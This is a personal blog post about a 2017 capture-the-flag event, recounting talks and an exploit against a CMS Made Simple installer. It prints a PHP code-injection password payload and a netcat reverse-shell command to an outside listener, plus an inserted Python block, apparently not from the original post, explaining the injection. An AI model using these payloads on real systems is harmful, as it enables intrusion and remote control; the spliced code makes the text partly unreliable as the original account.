A wonderful day at CTF036 2017

2017-03-31 22:40:00

Today was a blast! In what has become an annual tradition, Ultimum organised the third edition of their CTF036 event.

A big change since last year: I started the day not by listening, but by talking! I presented the “My first RH hack” talk, which I’d given last year at IT Gilde. In it, I outlined what I’d learned hacking the Kerui alarm system. The slides to my presentation can be found here.

Reactions from the attendants were generally positive: apparently my presentation style was well-received and I’d matched the content’s level to that of the crowd. I was followed by John Kroon, who detailed a vulnerability assessment framework he’d built, and by Sijmen Ruwhof. The latter has recently gained some fame with his public outcry regarding the Dutch voting process and the software involved. It’s quite the kerfuffle!

The CTF was quite a challenge! Like last year we were presented with an A4-sized description of the target, which basically hinted at a domain name, a mail server and a DNS server. After some initial confusion about IP ranges, I got off to a start. DNSenum confirmed three hosts in one network, with two others in a deeper subnet. The three servers out in the open are respectively a web server, the mail server and a Windows host with data shares.

Like last year, I started with the web server. This runs CMS-Made-Simple v1.1.2. Sploitsearch did not list anything that seemed immediately useful, but Nikto did show me that various useful subdirs were found, including /admin and /install. John’s colleague Jordy quickly found something interesting, which relies upon /install not being deleted: CMS-MS PHP Code Injection vulnerability.

By this time a few competitors had discovered something I’d missed: the Windows box had a freely accessible share with three of the sought-after accounts, worth 30 points. Of the twenty-odd competitors, three had 30 points within the first hour.

John and I continued poking at Jordy’s suggestion, with Rik across the tables following suit. I was the first to get it to work, after Jordy spurred me on. The basic process was indeed as outlined in the linked article:

  1. Set up MySQL on my own system.
  2. Make a random, empty database and grant a new account (e.g. “test”) full access to the database.
  3. The password to the user account must be: '.passthru($_GET['command']);exit;//
  4. The database must be accessible remotely (change mysql.cnf and use the appropriate GRANT, more info here).
  5. At this point you use the setup tool in /install to point CMS-MS at your own database. Uncheck the boxes in step #4.
  6. Once you’ve finished the setup tool, the config.php file contains the password above, which enables you to call the base URL with an added “?command=” where you can enter any arbitrary command for the host OS.
  7. I quickly found that the target host had /bin/netcat installed, so I could run http://www.thesmartcloud.nl/?command=/bin/netcat -e /bin/bash 172.100.23.74 443
  8. This connects to my listening netcat on my port 443. Ace!
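To make clear why the password in step 3 works, here is an added illustration that is not code from the original post, from Ultimum, or from CMS Made Simple itself. It assumes (as a simplification) that the installer writes the database password into config.php by pasting it verbatim inside a single-quoted PHP string; the "naive" and "escaped" writers, the string scanner and the URL builder are all hypothetical helpers written for this example. The payload, host and port are the ones quoted above.

```python
"""
Why '.passthru($_GET['command']);exit;// turns config.php into a web shell.

Added example: a simplified model of an installer that writes the DB
password into config.php, once without escaping and once with PHP
single-quote escaping (what var_export() would produce). A tiny scanner
then shows which part of the generated line ends up as live PHP code.
"""
from urllib.parse import urlencode

# The password used in step 3 of the procedure above.
PAYLOAD = "'.passthru($_GET['command']);exit;//"


def render_config_naive(db_password: str) -> str:
    """Hypothetical installer: pastes the password straight into the template."""
    return "<?php\n$config['db_password'] = '" + db_password + "';\n"


def render_config_escaped(db_password: str) -> str:
    """Same template, but the password is escaped for a PHP single-quoted
    string (backslash and single quote are the only special characters)."""
    escaped = db_password.replace("\\", "\\\\").replace("'", "\\'")
    return "<?php\n$config['db_password'] = '" + escaped + "';\n"


def code_outside_strings(php: str) -> str:
    """Return the characters of `php` that sit outside single-quoted string
    literals. Minimal scanner for this example: it only understands
    single-quoted strings with \\' and \\\\ escapes, which is all the
    generated config line uses."""
    out = []
    in_str = False
    i = 0
    while i < len(php):
        c = php[i]
        if in_str:
            if c == "\\" and i + 1 < len(php):
                i += 2          # skip the escaped character
                continue
            if c == "'":
                in_str = False
        elif c == "'":
            in_str = True
        else:
            out.append(c)
        i += 1
    return "".join(out)


def injected_code_is_live(php: str) -> bool:
    """True if passthru( appears as PHP code rather than inside a string."""
    return "passthru(" in code_outside_strings(php)


def build_command_url(base_url: str, command: str) -> str:
    """Build the ?command= URL with the command properly URL-encoded, so the
    spaces and slashes in a netcat reverse-shell line survive the request."""
    return base_url + "?" + urlencode({"command": command})


if __name__ == "__main__":
    naive = render_config_naive(PAYLOAD)
    safe = render_config_escaped(PAYLOAD)
    print(naive)
    print("naive config executes passthru():", injected_code_is_live(naive))
    print(safe)
    print("escaped config executes passthru():", injected_code_is_live(safe))
    print(build_command_url("http://www.thesmartcloud.nl/",
                            "/bin/netcat -e /bin/bash 172.100.23.74 443"))
```

In the naive output the first quote of the payload closes the empty password string, `.passthru($_GET['command']);exit;` becomes ordinary PHP, and `//` comments out the installer's own closing `';`, which is exactly why every later request to the site with `?command=` runs that command as www-data. With the escaped writer the same payload is just an odd-looking password. The URL builder is there because the netcat line in step 7 contains spaces; a browser will usually encode them for you, but a scripted request should do it explicitly.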

Netcat gave me a shell as user “www-data”. Poking around the host I found no abusable SUID executables, no sudo rules and no obvious methods for privesc. I did manage to grab /home/accounts.txt which contains seven accounts. Thus, for about half an hour, I was in the gleeful position of being 1st with 70 points 😀

While I kept poking at the web server and later moved on to the RoundCube/Dovecot box, I also helped John and Rik while they tried to get the CMS-MS exploit to work. Word got around quickly and a few of the guys who already had 30pts moved up to 100, with about 40mins left. I tried hard, but I couldn’t find a way to score more points, so I ended up in 5th place today.

Ultimum’s Michael informed us that the maximum score attainable was 500pts, so basically none of us had scratched beyond the surface by 16:00. As I said: they made it quite the challenge! It was a lot of fun!

Source: Thomas’ personal website: https://www.kilala.nl/index.php?id=2389